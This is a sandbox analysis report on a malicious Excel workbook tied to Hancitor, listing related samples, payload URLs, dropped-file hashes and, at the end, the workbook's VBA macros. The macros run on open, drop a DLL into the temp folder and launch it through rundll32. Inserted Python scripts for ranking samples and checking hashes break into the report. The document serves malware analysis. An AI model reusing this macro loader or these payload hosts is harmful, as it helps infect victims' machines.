                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.phis.troj.spyw.expl.evad.winXLS@9/7@7/5
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 11.4% (good quality ratio 11.1%)
                                            • Quality average: 88.6%
                                            • Quality standard deviation: 21.1%
                                            HCA Information:
                                            • Successful, ratio: 74%
                                            • Number of executed functions: 29
                                            • Number of non-executed functions: 18
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .xls
                                            • Changed system and user locale, location and keyboard layout to English - United States
                                            • Changed system and user locale, location and keyboard layout to Japanese - Japan
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Active ActiveX Object
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtCreateFile calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
16:10:39 | API Interceptor | 1x Sleep call for process: imjppdmg.exe modified
16:10:57 | API Interceptor | 1308x Sleep call for process: rundll32.exe modified
16:10:59 | API Interceptor | 21x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Associated Sample Name / URL | Detection | Context
Match: 54.235.88.121
  0712_4155631572.doc | malicious | api.ipify.org/?format=xml
  0712_0838282133.doc | malicious | api.ipify.org/
  ter.dll | malicious | api.ipify.org/?format=xml
Match: 50.16.239.65
  Remittance.html | malicious
Match: 8.211.241.0
  532.dll | malicious | s0lom0n.ru/7hsjfd9w4refsd.exe
  0722_5065418752.xls | malicious | s0lom0n.ru/7hsjfd9w4refsd.exe
  ter.dll | malicious | min0sra.ru/7t4dfgnmkk7.exe
  ier.dll | malicious | 4a5ikol.ru/7jkio8943wk.exe
  0714_2313552213.doc | malicious | 4a5ikol.ru/7jkio8943wk.exe
  0714_1242782601.doc | malicious | 4a5ikol.ru/7jkio8943wk.exe
  ter.dll | malicious | 4a5ikol.ru/7jkio8943wk.exe
  ter.dll | malicious | tryffeltinor.ru/7dfgdrttg6.exe
  0712_2210055252.doc | malicious | pirocont70l.ru/7hjujnfds.exe
  0712_4155631572.doc | malicious | pirocont70l.ru/7hjujnfds.exe
  0712_0838282133.doc | malicious | pirocont70l.ru/7hjujnfds.exe
  ter.dll | malicious | pirocont70l.ru/7hjujnfds.exe
  0712_2520287506.doc | malicious | pirocont70l.ru/7hjujnfds.exe
  0712_5267808768.doc | malicious | pirocont70l.ru/7hjujnfds.exe
  0712_0017864438.doc | malicious | pirocont70l.ru/7hjujnfds.exe
  0712_3830710356.doc | malicious | pirocont70l.ru/7hjujnfds.exe
  2021-07-12-Hancitor-DLL-example-03.dll | malicious | pirocont70l.ru/7hjujnfds.exe
  2021-07-12-Hancitor-DLL-example-05.dll | malicious | pirocont70l.ru/7hjujnfds.exe
  2021-07-12-Hancitor-DLL-example-06.dll | malicious | pirocont70l.ru/7hjujnfds.exe
  2021-07-12-Hancitor-DLL-example-04.dll | malicious | pirocont70l.ru/7hjujnfds.exe

Domains

Associated Sample Name / URL | Detection | Context
Match: elb097307-934924932.us-east-1.elb.amazonaws.com
  532.dll | malicious | 54.225.245.108
  0722_5065418752.xls | malicious | 54.243.175.83
  U6i3o7E68j.exe | malicious | 50.16.238.218
  9QFzJlxaTl.dll | malicious | 50.19.92.227
  Remittance.html | malicious | 50.16.239.65
  0706_1643278086845.doc | malicious | 54.225.78.40
  123.dll | malicious | 50.19.92.227
  DDA9.dll | malicious | 23.21.168.151
  4fZX8fJwHn.dll | malicious | 54.235.190.106
  Drawing for New Purchase Order.exe | malicious | 23.21.224.49
  triage_dropped_file.dll | malicious | 54.243.175.83
  265.exe | malicious | 54.243.175.83
  7QC4uSmZCg.exe | malicious | 54.225.78.40
  ter.dll | malicious | 23.21.224.49
  WSn11SBJ55.dll | malicious | 50.16.216.118
  aIY9sQv1qW.exe | malicious | 23.21.224.49
  ier.dll | malicious | 23.21.173.155
  0714_2313552213.doc | malicious | 54.225.165.85
  0714_1242782601.doc | malicious | 54.225.165.85
  T20009002.exe | malicious | 54.225.78.40
Match: pospvisis.com
  532.dll | malicious | 95.213.179.67
  0722_5065418752.xls | malicious | 95.213.179.67
  ter.dll | malicious | 95.213.179.67
  ier.dll | malicious | 95.213.179.67
  0714_2313552213.doc | malicious | 95.213.179.67
  0714_1242782601.doc | malicious | 95.213.179.67
  ter.dll | malicious | 95.213.179.67
  0712_2210055252.doc | malicious | 95.213.179.67
  0712_4155631572.doc | malicious | 95.213.179.67
  0712_0838282133.doc | malicious | 95.213.179.67
  ter.dll | malicious | 95.213.179.67
  0712_2520287506.doc | malicious | 95.213.179.67
  0712_5267808768.doc | malicious | 95.213.179.67
  0712_0017864438.doc | malicious | 95.213.179.67
  0712_3830710356.doc | malicious | 95.213.179.67
  2021-07-12-Hancitor-DLL-example-03.dll | malicious | 95.213.179.67
  2021-07-12-Hancitor-DLL-example-05.dll | malicious | 95.213.179.67
  2021-07-12-Hancitor-DLL-example-04.dll | malicious | 95.213.179.67
  0712_2172200614.doc | malicious | 95.213.179.67
  0712_3006077542.doc | malicious | 95.213.179.67

ASN

Associated Sample Name / URL | Detection | Context
Match: AMAZON-AESUS
  532.dll | malicious | 54.225.245.108
  0722_5065418752.xls | malicious | 54.225.245.108
  U6i3o7E68j.exe | malicious | 50.16.238.218
  9QFzJlxaTl.dll | malicious | 50.19.92.227
  ovLjmo5UoE | malicious | 54.61.128.52
  o3ZUDIEL1v | malicious | 54.140.119.74
  D1dU3jQ1II | malicious | 34.207.187.69
  wREFu91LXZ.exe | malicious | 52.5.43.61
  br8oLpYtwO.exe | malicious | 54.237.66.139
  uiza7XkNGQPRQvb.exe | malicious | 3.223.115.185
  A7X93JRxhp | malicious | 54.146.206.59
  8ZJ0cPowTy | malicious | 54.29.51.121
  XuQRPW44hi | malicious | 52.44.113.28
  5qpsqg7U0G | malicious | 54.0.244.90
  Remittance.html | malicious | 50.16.239.65
  ZlvFNj.dll | malicious | 3.223.192.20
  bPAMfuy9oa | malicious | 107.23.89.187
  U4r9W64doy | malicious | 54.61.104.90
  C4PozjQdGE | malicious | 54.131.116.216
  kb5IbEJU8c | malicious | 54.2.185.151
Match: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
  532.dll | malicious | 8.211.241.0
  0722_5065418752.xls | malicious | 8.211.241.0
  pax. 415-12.07.2021.js | malicious | 47.254.174.190
  P58w6OezJY.exe | malicious | 8.208.92.235
  rxfttQnoO5 | malicious | 47.75.21.31
  TFG18FA4eD | malicious | 8.213.213.241
  Filmora-Wondershare-Installer.exe | malicious | 47.91.67.36
  ViJoy.exe | malicious | 47.91.67.36
  wy2BysBF1U | malicious | 47.91.26.153
  leyw73RE9o | malicious | 47.252.147.45
  NzQGtyZFe8 | malicious | 47.255.177.113
  XfKsLIPLUu | malicious | 8.211.161.2
  AT9n7Bk0yE | malicious | 47.251.12.169
  jvD4W5Csk1.exe | malicious | 8.209.69.242
  Cc8M6hqDMe.exe | malicious | 47.254.175.174
  e19e0e7f8871e7acf07a37b277b5aaf2aa125f28ee116.exe | malicious | 8.209.64.72
  18ccb7df2f91787a9392bf60d2f7019c86af65584c8a9.exe | malicious | 8.209.64.72
  xBMx9OBP97.exe | malicious | 8.208.92.93
  CSyG3zNcwS.exe | malicious | 8.208.92.93
  BrCi5pJr8J.exe | malicious | 8.208.92.93

JA3 Fingerprints

No context

Dropped Files

Associated Sample Name / URL | Detection | Context
Match: C:\Users\user\AppData\Local\Temp\532.dll
  0722_5065418752.xls | malicious
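The context tables above list, for each indicator this workbook touched, the other submissions that touched the same indicator. One way to turn those rows into a ranked list of related samples, as an added example that is not part of the Joe Sandbox report: the rows below are a hand-copied subset of the IPs, Domains, ASN and Dropped Files tables above, the per-indicator-type weights are this example's own assumption (the report defines none), and sample names stand in for the SHA-256 links the report uses as keys. Names such as ter.dll recur for different files, so a real pivot should key on the hash instead.

```python
"""Rank the other submissions in the "Joe Sandbox View / Context" tables by
how much infrastructure they share with this sample.

Added example, not part of the Joe Sandbox report.
"""
from collections import defaultdict

# (indicator type, indicator, associated sample) rows, hand-copied as a subset
# of the IPs, Domains, ASN and Dropped Files context tables above. The "url"
# rows are the Context column of the IPs table. Sample names are not unique in
# the report (several different files are called ter.dll); the SHA-256 behind
# each row's link is the real key, so substitute it for the name in practice.
CONTEXT_ROWS = [
    ("ip", "8.211.241.0", "532.dll"),
    ("ip", "8.211.241.0", "0722_5065418752.xls"),
    ("ip", "8.211.241.0", "ter.dll"),
    ("ip", "8.211.241.0", "ier.dll"),
    ("ip", "8.211.241.0", "0714_2313552213.doc"),
    ("ip", "54.235.88.121", "0712_4155631572.doc"),
    ("ip", "54.235.88.121", "0712_0838282133.doc"),
    ("ip", "54.235.88.121", "ter.dll"),
    ("url", "s0lom0n.ru/7hsjfd9w4refsd.exe", "532.dll"),
    ("url", "s0lom0n.ru/7hsjfd9w4refsd.exe", "0722_5065418752.xls"),
    ("url", "min0sra.ru/7t4dfgnmkk7.exe", "ter.dll"),
    ("url", "4a5ikol.ru/7jkio8943wk.exe", "ier.dll"),
    ("url", "4a5ikol.ru/7jkio8943wk.exe", "0714_2313552213.doc"),
    ("domain", "pospvisis.com", "532.dll"),
    ("domain", "pospvisis.com", "0722_5065418752.xls"),
    ("domain", "pospvisis.com", "ter.dll"),
    ("domain", "pospvisis.com", "ier.dll"),
    ("domain", "pospvisis.com", "0714_2313552213.doc"),
    ("domain", "elb097307-934924932.us-east-1.elb.amazonaws.com", "532.dll"),
    ("domain", "elb097307-934924932.us-east-1.elb.amazonaws.com", "0722_5065418752.xls"),
    ("domain", "elb097307-934924932.us-east-1.elb.amazonaws.com", "U6i3o7E68j.exe"),
    ("domain", "elb097307-934924932.us-east-1.elb.amazonaws.com", "Remittance.html"),
    ("asn", "AMAZON-AESUS", "532.dll"),
    ("asn", "AMAZON-AESUS", "0722_5065418752.xls"),
    ("asn", "AMAZON-AESUS", "Remittance.html"),
    ("asn", "AMAZON-AESUS", "wREFu91LXZ.exe"),
    ("asn", "CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC", "532.dll"),
    ("asn", "CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC", "0722_5065418752.xls"),
    ("asn", "CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC", "Filmora-Wondershare-Installer.exe"),
    ("asn", "CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC", "ViJoy.exe"),
    ("dropped", r"C:\Users\user\AppData\Local\Temp\532.dll", "0722_5065418752.xls"),
]

# Assumed weights for this example (the report defines none): a shared dropped
# file or payload URL is strong evidence of one campaign, a shared C2 domain a
# little less, a shared IP less again, and a shared hosting ASN is noise, since
# Amazon and Alibaba address space is shared with unrelated samples.
DEFAULT_WEIGHTS = {"dropped": 4, "url": 3, "domain": 3, "ip": 2, "asn": 0}


def index_by_sample(rows):
    """Map each sample name to the set of (type, indicator) it shares with us."""
    index = defaultdict(set)
    for kind, indicator, sample in rows:
        index[sample].add((kind, indicator))
    return index


def score_related(rows, weights=None):
    """[(sample, score)] sorted by score desc, then name; zero scores dropped."""
    weights = {**DEFAULT_WEIGHTS, **(weights or {})}
    ranked = []
    for sample, indicators in index_by_sample(rows).items():
        score = sum(weights.get(kind, 0) for kind, _ in indicators)
        if score > 0:
            ranked.append((sample, score))
    return sorted(ranked, key=lambda item: (-item[1], item[0]))


def evidence(rows, sample, weights=None):
    """The shared indicators behind one sample's score, strongest type first."""
    weights = {**DEFAULT_WEIGHTS, **(weights or {})}
    indicators = index_by_sample(rows).get(sample, set())
    return sorted(indicators, key=lambda t: (-weights.get(t[0], 0), t[0], t[1]))


if __name__ == "__main__":
    for sample, score in score_related(CONTEXT_ROWS)[:5]:
        print(f"{score:3d}  {sample}")
        for kind, indicator in evidence(CONTEXT_ROWS, sample):
            print(f"       {kind:8s} {indicator}")
```

With the default weights the sibling workbook 0722_5065418752.xls ranks first on the shared payload URL, both domains, the IP and the dropped 532.dll, while the Alibaba and Amazon ASN neighbours (Filmora-Wondershare-Installer.exe, ViJoy.exe, wREFu91LXZ.exe) drop out entirely; pass `{"asn": 1}` as the weights override and they reappear, which is the reason to leave that type at zero.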

Created / dropped Files

C:\ProgramData\kaosdma.txt
Process: C:\Windows\SysWOW64\svchost.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 10
Entropy (8bit): 2.6464393446710157
Encrypted: false
SSDEEP: 3:HLLg:fg
MD5: FA13251DCFFD9666C5F92DF673E69E62
SHA1: 6D6CB94CF09D537789A1D4CC3A85470F3510FC14
SHA-256: 70896E7D7D47410A6F025E85B8239C1CA68BD3DF5B0FFE7017F1743043E37E1E
SHA-512: 18FE6A5F7246C089C7719BE4D069EADE83E032E41DD7FB8F7A0C2AD2C371A712026A57606CD6220B0DDC52EB35C483074D2BC21431E658944BAC157DEEF191A6
Malicious: false
Reputation: low
Preview: 84.17.52.8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BKHVJ3NI.txt
Process: C:\Windows\SysWOW64\svchost.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 10
Entropy (8bit): 2.6464393446710157
Encrypted: false
SSDEEP: 3:HLLg:fg
MD5: FA13251DCFFD9666C5F92DF673E69E62
SHA1: 6D6CB94CF09D537789A1D4CC3A85470F3510FC14
SHA-256: 70896E7D7D47410A6F025E85B8239C1CA68BD3DF5B0FFE7017F1743043E37E1E
SHA-512: 18FE6A5F7246C089C7719BE4D069EADE83E032E41DD7FB8F7A0C2AD2C371A712026A57606CD6220B0DDC52EB35C483074D2BC21431E658944BAC157DEEF191A6
Malicious: false
Reputation: low
Preview: 84.17.52.8
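The two ten-byte text files above (kaosdma.txt written by svchost.exe and its copy in the IE cache) carry identical hashes, entropy and ssdeep, and their preview is a dotted-quad address, consistent with the api.ipify.org lookups recorded in the IP context. As an added example that is not part of the report, the script below recomputes the size, 8-bit entropy and hash fields from the file bytes and checks them against the values printed above. The byte string is reconstructed from the report's Size and Preview fields and assumed to be exactly those ten ASCII bytes with no newline; ssdeep is not recomputed (it needs a third-party library), and the IPv4 check is this example's own addition.

```python
"""Recompute the size, 8-bit entropy and hash fields of a dropped file and
check them against the values printed in the report.

Added example, not part of the Joe Sandbox report.
"""
import hashlib
import math
import re
from collections import Counter

# Reconstructed from the report's Size (10 bytes) and Preview ("84.17.52.8")
# fields for C:\ProgramData\kaosdma.txt. Assumption: the file is exactly these
# ten ASCII bytes with no trailing newline ("no line terminators").
KAOSDMA_BYTES = b"84.17.52.8"

# Values copied from the report entry above (ssdeep omitted: it needs a
# third-party library and is not recomputed here).
REPORTED = {
    "size": 10,
    "entropy": 2.6464393446710157,
    "md5": "FA13251DCFFD9666C5F92DF673E69E62",
    "sha1": "6D6CB94CF09D537789A1D4CC3A85470F3510FC14",
    "sha256": "70896E7D7D47410A6F025E85B8239C1CA68BD3DF5B0FFE7017F1743043E37E1E",
    "sha512": "18FE6A5F7246C089C7719BE4D069EADE83E032E41DD7FB8F7A0C2AD2C371A712026A57606CD6220B0DDC52EB35C483074D2BC21431E658944BAC157DEEF191A6",
}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy over byte values, in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_metrics(data: bytes) -> dict:
    """The report's per-file fields that can be derived from the bytes alone."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def compare_to_report(data: bytes, reported: dict) -> dict:
    """Map each reported field to True/False depending on whether it reproduces."""
    computed = file_metrics(data)
    result = {}
    for field, value in reported.items():
        if field == "entropy":
            # Floating point: accept the printed value within 1e-12 bits/byte.
            result[field] = math.isclose(computed[field], value, rel_tol=0.0, abs_tol=1e-12)
        else:
            result[field] = computed[field] == value
    return result


# Dotted quad with every octet in 0..255 (leading zeros tolerated).
_IPV4 = re.compile(r"(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)")


def is_single_ipv4(data: bytes) -> bool:
    """True when the whole file is one IPv4 address, as kaosdma.txt is here."""
    try:
        text = data.decode("ascii").strip()
    except UnicodeDecodeError:
        return False
    return _IPV4.fullmatch(text) is not None


if __name__ == "__main__":
    for field, ok in compare_to_report(KAOSDMA_BYTES, REPORTED).items():
        print(f"{field:8s} reproduces: {ok}")
    print("single IPv4 address:", is_single_ipv4(KAOSDMA_BYTES))
```

Run against a file pulled from the sandbox's dropped-file archive, a False for any hash field means the archived bytes differ from what the report analysed (a truncated download or an added newline is the usual cause), while a True on every field confirms the artifact is the one the report describes.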
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3ECECA93.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 4976
Entropy (8bit): 3.879470172171999
Encrypted: false
SSDEEP: 48:ptNZgsdBgD89t1Tb4HKKZX3Y6kpYjdHkYaP6:xZlBvt1X6YU5EH6
MD5: C647941F85819463821807ED3BCA9A80
SHA1: 4A52009C351C9F08D67A235021CB9D618B3FB39F
SHA-256: 6BE153848165D1AB8A23EF5EB177D719A15CCA021937E3C28E5C88514D070910
SHA-512: 5AF1A4677BA2A36D2D087751C89F99A523D67C54524A64E6AB805E24CAAC6719EF617B3C9594CD8535E582A470FDA99DC63D4F26E7B5B89E6028DA2DCDE02EE9
Malicious: false
Reputation: low
                                                Preview: ....l...........-.../...........^....... EMF....p.......................V.......i......................:...........................3...5...R...p...................................S.e.g.o.e. .U.I.....................................................\.......................8..XD..........._..............0..XD...........................T.......X..XD...................a$7........XD....................$..............wg.........XD...X..X............8..XD...................0..XD...I..XD...X..XD.......dv......%...................................r...............)............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C91F519.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 4976
Entropy (8bit): 3.8552592590578634
Encrypted: false
SSDEEP: 48:pWN5aFsdBgD89t1Tb4HKKZX3Y6kpnydHkGau:E5a0Bvt1X6Y+Ek
MD5: 4FEB2EE830D455756D2B803BC43B53E1
SHA1: ED22FEB2E91F8CC3E5868450011B2E3F413A9F76
SHA-256: BF3819F146CC5D4FB9ED888415DEE9A3BB043DF9CD0D1151D218BFC2D344A6CC
SHA-512: F21D2B5AB048A1EF5D9D41986F60C1176DD2351C438B498A44AF65CCD69CE1F781EE3B8294FF44756A9E4B19B3F85D868598A68ACC82D1BBE6603A6654AC51DD
Malicious: false
                                                Preview: ....l...........%.../...........p....... EMF....p.......................V.......i......................:...........................*...5...R...p...................................S.e.g.o.e. .U.I.....................................................\.......@'X2....(.,..............................xb....0(X2.....................'X2.............'X2....................a$........,............................. .,.......+...................................................0(X2....I(X2....X)X2........dv......%...................................r...............$............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D91DB78.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 4976
Entropy (8bit): 3.8697655321605633
Encrypted: false
SSDEEP: 48:ptN3ZYDgsdBgD89t1Tb4HKKZX3Y6kpnydHkfaP6:xJ6lBvt1X6Y+Es6
MD5: 561ADBAB9E33ED0833A3CA3299DA356A
SHA1: 8F185A2A67D70606A57654F158A30EFD9CE33B3C
SHA-256: 275929AF7553B75A1355E0FD96B655DBBD56C81A890F06A5CB2B8882BF5F45B8
SHA-512: 9DABDDC451289F3FBBEE6173F9C9AA1724AC2324AE50D6FF43034C0E58373C9C40F82132DD472EA8C26176C60071E57B8C988E6A94FF7CF20306D87029448FA4
Malicious: false
                                                C:\Users\user\AppData\Local\Temp\532.dll
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):204800
                                                Entropy (8bit):6.327152340682224
                                                Encrypted:false
                                                SSDEEP:3072:HLg/uYnxzUzb9HbHYgaf8odt7DBsXFJktl/ML5xtREVFW5p3d+0d:HMZJUzBZaf84VE4l/ML5xEop3fd
                                                MD5:7348620F737EC1B0997CAE7548344F2C
                                                SHA1:5550F62FDC0963C331B460F8A967C45D481E505A
                                                SHA-256:8EFAC1531E83525BB0806EEBCA0BB9A797A18FEB1848A4CEEE4A88FDB85CBBBD
                                                SHA-512:568BABF18BA8AD33C9756E43610172361132F076BB4601E0E046317A30A298DA453219F43A2B5FFAFC5C535E4CA62FFFF622AE7BF084EFBA786946B880F9DDB6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                Joe Sandbox View:
                                                • Filename: 0722_5065418752.xls, Detection: malicious, Browse
                                                C:\Users\user\AppData\Local\Temp\532.dll:Zone.Identifier
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:gAWY3n:qY3n
                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                Malicious:false
                                                Preview: [ZoneTransfer]..ZoneId=3..

                                                Static File Info

                                                General

                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Jul 22 11:32:50 2021, Security: 0
                                                Entropy (8bit):6.79339812364088
                                                TrID:
                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                File name:0722_2857746751.xls
                                                File size:351232
                                                MD5:97538e922b86b2ae95625d1e11e6aaf1
                                                SHA1:928e4d89b379bdd7c894787431a8d0b42f28a5a4
                                                SHA256:83c9c9beaca0a147e23995b84792f56cd130ccf262147374bd1114c2ac698fee
                                                SHA512:c002b9f11892fb3882ccb7b07e91a5396370232407614ea1f5b4b6dbf7cde70c59c699415e01066731454debfb8e468a15def21ef889b92dedeabde79a623ed7
                                                SSDEEP:6144:gMZJUzBZaf84VE4l/ML5xEop3fduk3hOdsylKlgxopeiBNhZF+E+W2kdAvvvvvv8:3AO84VE4l/MLzEglYfPEDvL3

                                                File Icon

                                                Icon Hash:e4eea286a4b4bcb4

                                                Static OLE Info

                                                General

                                                Document Type:OLE
                                                Number of OLE Files:1

                                                OLE File "0722_2857746751.xls"

                                                Indicators

                                                Has Summary Info:True
                                                Application Name:unknown
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:True
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:
                                                Flash Objects Count:
                                                Contains VBA Macros:True

                                                Summary

                                                Code Page:1252
                                                Author:
                                                Last Saved By:
                                                Create Time:2015-06-05 18:17:20
                                                Last Saved Time:2021-07-22 10:32:50
                                                Security:0

                                                Document Summary

                                                Document Code Page:1252
                                                Thumbnail Scaling Desired:False
                                                Company:
                                                Contains Dirty Links:False
                                                Shared Document:False
                                                Changed Hyperlinks:False
                                                Application Version:1048576

                                                Streams with VBA

                                                VBA File Name: Module1.bas, Stream Size: 2081
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                VBA File Name:Module1.bas
                                                Stream Size:2081

                                                VBA Code Keywords

                                                Keyword
                                                Nedc,
                                                String)
                                                nam(pafs
                                                mds.SubFolders
                                                Search(mds
                                                VB_Name
                                                ErrHandle:
                                                Ters.Name
                                                Err.Clear
                                                Object
                                                Environ$("temp")
                                                Search
                                                mds.Files
                                                "omsh.dll"
                                                Attribute
                                                Object,
                                                VBA Code
                                                Attribute VB_Name = "Module1"
                                                
                                                Sub nam(pafs As String)
                                                Name pafs As Environ$("temp") & "\" & "omsh.dll"
                                                End Sub
                                                
                                                
                                                
                                                 
                                                 Sub Search(mds As Object, pafs As String)
                                                 Dim Nedc As Object
                                                
                                                  
                                                   For Each Nedc In mds.SubFolders
                                                     Search Nedc, pafs
                                                   Next Nedc
                                                Dim Ters As Object
                                                   For Each Ters In mds.Files
                                                   
                                                   If Ters.Name = "532.dll" Then
                                                       
                                                        pafs = Ters
                                                        End If
                                                   Next Ters
                                                   Exit Sub
                                                ErrHandle:
                                                   
                                                   Err.Clear
                                                End Sub
                                                VBA File Name: Sheet1.cls, Stream Size: 999
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                VBA File Name:Sheet1.cls
                                                Stream Size:999

                                                VBA Code Keywords

                                                Keyword
                                                False
                                                VB_Exposed
                                                Attribute
                                                VB_Name
                                                VB_Creatable
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                VB_Base
                                                VB_Customizable
                                                VB_TemplateDerived
                                                VBA Code
                                                Attribute VB_Name = "Sheet1"
                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                VBA File Name: ThisWorkbook.cls, Stream Size: 4517
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                VBA File Name:ThisWorkbook.cls
                                                Stream Size:4517
                                                Data ASCII:. . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . c . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . 0 . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e l l E x e c u t e A . . . . . . . . . . . . . x . . . . . r ) . . ~ . c A . . . . q | . p . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . S f . ( b L . J . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . S f . ( b L . J . . . . . 1 . . r )

                                                VBA Code Keywords

                                                Keyword
                                                Scripting.FileSystemObject
                                                String,
                                                ByVal
                                                "texmp"
                                                VB_Name
                                                VB_Creatable
                                                "ThisWorkbook"
                                                VB_Exposed
                                                nShowCmd
                                                FileSystemObject
                                                PtrSafe
                                                Selection.Copy
                                                "ShellExecuteA"
                                                Function
                                                (ByVal
                                                "\omsh.dll,SHIIJGLGNAB",
                                                Option
                                                Dir(vcbc
                                                nam(Ioes)
                                                Long)
                                                Environ$("temp")
                                                Long,
                                                VB_Customizable
                                                vbNullString,
                                                ActiveSheet.Shapes.Range(Array("Object
                                                ".exe"
                                                Explicit
                                                "rundl"
                                                xxx()
                                                Alias
                                                lpDirectory
                                                Ioes)
                                                VB_TemplateDerived
                                                Declare
                                                String
                                                Compare
                                                False
                                                lpFile
                                                Attribute
                                                lpParameters
                                                Workbook_Open()
                                                Private
                                                VB_PredeclaredId
                                                asdaf
                                                VB_GlobalNameSpace
                                                "\omsh.dll")
                                                VB_Base
                                                Search(asdaf.GetFolder(usx),
                                                lpOperation
                                                Len(Ioes)
                                                VBA Code
                                                Attribute VB_Name = "ThisWorkbook"
                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                Option Compare Text
                                                Option Explicit
                                                Dim Ioes As String
                                                  Private Declare PtrSafe Function fffz Lib "shell32"         Alias "ShellExecuteA" (ByVal hwnd As Long,         ByVal lpOperation As String, ByVal lpFile As String,         ByVal lpParameters As String, ByVal lpDirectory As String,         ByVal nShowCmd As Long) As Long
                                                Private Sub Workbook_Open()
                                                
                                                  
                                                
                                                Dim vcbc As String
                                                vcbc = Environ$("temp")
                                                Dim xc
                                                xc = "texmp"
                                                If Dir(vcbc & "\omsh.dll") = "" Then
                                                
                                                ActiveSheet.Shapes.Range(Array("Object 20")).Select
                                                Selection.Copy
                                                
                                                
                                                Call xxx
                                                
                                                If Len(Ioes) > 2 Then
